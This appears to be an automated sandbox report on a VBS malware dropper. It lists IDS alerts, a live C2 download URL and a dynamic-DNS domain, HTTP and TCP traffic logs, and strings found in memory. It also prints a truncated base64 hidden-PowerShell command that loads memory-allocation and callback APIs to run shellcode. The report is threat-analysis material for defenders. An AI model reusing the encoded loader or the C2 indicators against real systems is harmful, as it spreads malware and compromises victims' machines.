            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49808 -> 103.167.84.150:80
            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 103.167.84.150:80
            Potential malicious VBS script found (has network functionality)Show sources
            Source: Initial file: BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: septnet.duckdns.org
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox ViewASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49806 -> 193.104.197.85:6577
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpString found in binary or memory: http://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16335676506.0000000003298000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)
            Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binE
            Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binO
            Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s
            Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bind
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bins
            Source: powershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/pscore6lBpm
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownDNS traffic detected: queries for: septnet.duckdns.org
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache

            System Summary:

            barindex
            Wscript starts Powershell (via cmd or directly)Show sources
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgJump to behavior
            Very long command line foundShow sources
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7304
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7324
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7324
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7304Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7324Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7324Jump to behavior
            Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
            Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
            Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048990283_2_04899028
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04898FC03_2_04898FC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0489E8293_2_0489E829
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0489E8383_2_0489E838
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048990183_2_04899018
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08264A903_2_08264A90
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08261CC73_2_08261CC7
